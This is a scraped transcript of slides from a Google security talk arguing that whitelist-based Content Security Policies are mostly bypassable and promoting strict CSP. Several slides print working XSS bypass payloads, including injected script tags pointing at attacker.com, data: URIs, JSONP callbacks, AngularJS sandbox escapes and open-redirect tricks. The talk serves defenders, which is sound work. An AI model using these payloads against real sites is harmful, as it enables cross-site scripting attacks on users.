csp is dead long live strict csp
play

CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum About Us - PowerPoint PPT Presentation

CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum About Us Lukas Weichselbaum Michele Spagnuolo Senior Information Security Senior Information Security Engineer Engineer We work in a special focus area of the Google security team aimed


  1. CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum

  2. About Us Lukas Weichselbaum Michele Spagnuolo Senior Information Security Senior Information Security Engineer Engineer We work in a special focus area of the Google security team aimed at improving product security by targeted proactive projects to mitigate whole classes of bugs.

  3. WHAT IS CSP ? A tool developers can use to lock down their web applications in various ways. CSP is a defense-in-depth mechanism - it reduces the harm that a malicious injection can cause, but it is not a replacement for careful input validation and output encoding.

  4. CSP 2 specification: https://www.w3.org/TR/CSP/ GOALS OF CSP CSP 3 draft: https://w3c.github.io/webappsec-csp/ Have been pretty ambitious... Granular control over Sandbox not just iframes, but Find out when your application resources that can be executed any resource, framed or not. gets exploited , or behaves e.g. execution of inline scripts , The content is forced into a differently from how you think dynamic code execution (eval), unique origin, preventing it it should behave. By collecting trust propagation . from running scripts or plugins, violation reports, an submitting forms, etc... administrator can be alerted and easily spot the bug. MITIGATE XSS REDUCE PRIVILEGE DETECT EXPLOITATION risk of the application by monitoring violations 4

  5. WHAT’S IN A POLICY? It’s a HTTP header. CSP directives Actually, two. Most of them useless for XSS mitigation. base-uri enforcing mode default-src Content-Security-Policy: connect-src report-only mode img-src Content-Security-Policy-Report-Only: font-src child-src script-src frame-ancestors media-src object-src style-src plugin-types report-uri We’ll focus on script-src . 5

  6. HOW DOES IT WORK? A policy in detail Content-Security-Policy CSP money.example.com money.example.com allows default-src 'self'; script-src 'self' yep.com; <img src="cat.png"> yep.com CSP report-uri /csp_violation_logger; allows <script src="//yep.com/x.js"> 6

  7. HOW DOES IT WORK? Script injections (XSS) get blocked Content-Security-Policy CSP money.example.com money.example.com allows default-src 'self'; script-src 'self' yep.com; <img src="cat.png"> yep.com CSP report-uri /csp_violation_logger; allows <script attacker.com src="//yep.com/x.js"> CSP ">'><script blocks src="//attacker.com"> source not whitelisted CSP ">'><script>alert(42) blocks </script> DEMO inline script not allowed money.example.com/csp_violations_logger 7

  8. BUT... IT'S HARD TO DEPLOY Two examples from Twitter and GMail 8

  9. BUT... IT'S HARD TO DEPLOY Two examples from Twitter and GMail Policies get less secure the longer they get. These are not strict... they allow 'unsafe-inline' (and 'unsafe-eval'). Even if they removed 'unsafe-inline' (or added a nonce), any JSONP endpoint on whitelisted domains/paths can be the nail in their coffin. In practice, in a lot of real-world complex applications CSP is just used for monitoring purposes , not as a defense-in-depth against XSS. 9

  10. eaking ad

  11. COMMON MISTAKES [1/4] Trivial mistakes 'unsafe-inline' in script-src (and no nonce) Same for default-src , if script-src 'self' 'unsafe-inline'; there's no script-src object-src 'none'; directive. Bypass ">'>< script >alert(1337)</ script > 11

  12. COMMON MISTAKES [2/4] Trivial mistakes URL schemes or wildcard in script-src (and no 'strict-dynamic') Same for URL schemes and script-src 'self' https: data: *; wildcards in object-src . object-src 'none'; Bypasses ">'><script src= https ://attacker.com/evil.js></script> ">'><script src= data :text/javascript,alert(1337)></script> 12

  13. COMMON MISTAKES [3/4] Less trivial mistakes Missing object-src or default-src directive script-src 'self'; It looks secure, right? Bypass ">'>< object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/ch arts/assets/charts.swf?allowedDomain=\"})))}catch(e){ alert(1337) }//'> <param name="AllowScriptAccess" value="always"></ object > 13

  14. COMMON MISTAKES [4/4] Less trivial mistakes Allow 'self' + hosting user-provided content on the same origin script-src 'self'; Same for object-src . object-src 'none'; Bypass ">'><script src=" /user_upload/evil_cat.jpg.js "></script> 14

  15. BYPASSING CSP [1/5] Whitelist bypasses JSONP-like endpoint in whitelist script-src 'self' https://whitelisted.com; object-src 'none'; Bypass ">'><script src="https://whitelisted.com/jsonp?callback= alert "> DEMO 15

  16. BYPASSING CSP [2/5] JSONP is a problem bypassable.com alert(1);u({...}) CSP ">'><script allows src="https://whitelisted.com/j sonp?callback= alert(1);u "> A SOME * attack x.click({...}) CSP ">'><script allows src="https://whitelisted.com/j sonp?callback= x.click "> * Same Origin Method Execution 1) You whitelist an origin/path hosting a JSONP endpoint. 2) Javascript execution is allowed, extent is depending on how Don't whitelist JSONP endpoints. liberal the JSONP endpoint is and what a user can control Sadly, there are a lot of those out there. (just the callback function or also parameters). ...especially on CDNs! 16

  17. BYPASSING CSP [3/5] Whitelist bypasses AngularJS library in whitelist script-src 'self' https://whitelisted.com; object-src 'none'; Bypass "><script src=" https://whitelisted.com /angular.min.js"></script> <div ng-app ng-csp> {{1336 + 1}} </div> Also works without user "><script interaction, e.g. by combining src=" https://whitelisted.com /angularjs/1.1.3/angular.min.js"> with JSONP endpoints or other </script> JS libraries. <div ng-app ng-csp id=p ng-click=$event.view. alert (1337)> 17

  18. BYPASSING CSP [4/5] AngularJS is a problem bypassable.com Sandbox bypass in CSP AngularJS ng-app ng-csp ng-click=$event.view. alert(1337) > allows <script src=" //whitelisted.com/angular.js "></script> Outdated Angular ng-app ng-csp> CSP + outdated <script src="//whitelisted.com/angular.js"></script> allows Prototype.js giving <script src="//whitelisted.com/prototype.js"> access to window </script>{{$on.curry.call(). alert(1) }} Powerful JS frameworks are a problem 1) You whitelist an origin/path hosting a version of AngularJS with known sandbox bypasses. Or you combine it with outdated Prototype.js. Or JSONP endpoints. 2) The attacker can exploit those to achieve full XSS. Don't use CSP in combination with CDNs hosting AngularJS. For more bypasses in popular CDNs, see Cure53's mini-challenge. 18

  19. BYPASSING CSP [5/5] Path relaxation Path relaxation due to open redirect in whitelist script-src https://whitelisted.com/totally/secure.js https://site.with.redirect.com; object-src 'none'; Bypass Path is ignored ">'><script src="https://whitelisted.com/jsonp?callback= alert "> after redirect! ">'><script src="https://site.with.redirect.com/redirect?url=https%3A//whitelisted.com/ jsonp %2Fcallback%3D alert "> Spec: "To avoid leaking path information cross-origin (as discussed in Homakov’s Using Content-Security-Policy for Evil), the matching algorithm ignores path component of a source expression if the resource loaded is the result of a redirect." money.example.com <script CSP CSP site.with.redirect.com whitelisted.com src="https://site.with.redirect.com/ allows allows redirect?url=https%3A//whitelisted.com /jsonp%2Fcallback%3Dalert"></script> Path is ignored 19 after redirect!

  20. CSP EVALUATOR "A Tool to Rule Them All" https://csp-evaluator.withgoogle.com Core library is open source ● Also as a Chrome Extension ● 20

  21. How secure are real-world CSP policies ? Largest Empirical Study on Effectiveness of CSPs in the Web CSP is Dead, Long Live CSP On the Insecurity of Whitelists and the Future of Content Security Policy Lukas Weichselbaum, Michele Spagnuolo, Sebastian Lekies, Artur Janc ACM CCS, 2016, Vienna https://goo.gl/VRuuFN 21

  22. How secure are real-world CSP policies ? Largest Empirical Study on Effectiveness of CSPs in the Web CSP CSP 1.6 Million Google Index WWW 26,011 Hosts with 100 Billion pages unique CSPs CSP Filter Dedupe JSONP 8.8 Million JSONP Filter endpoints In addition to the CSPs, we also collected JSONP endpoints and Angular Angular libraries (whitelist bypasses) 2.6 Million Angular Filter libraries 22

  23. How secure are real-world CSP policies ? Largest Empirical Study on Effectiveness of CSPs in the Web Bypassable Unsafe Wildcard in Trivially Unique CSPs Report Only Missing domain unsafe_inline script-src Bypassable object_src in script-src whitelist Total whitelist 2591 21947 3131 5753 19719 24637 Unique CSPs 26011 9.96% 84.38% 12.04% 22.12% 75.81% 94.72% 0 19652 2109 4816 17754 21232 XSS Policies 22425 0% 87.63% 9.4% 21.48% 79.17% 94.68% 0 0 348 0 1015 1244 Strict XSS Policies 2437 0% 0% 14.28% 0% 41.65% 51.05% 23

Recommend


More recommend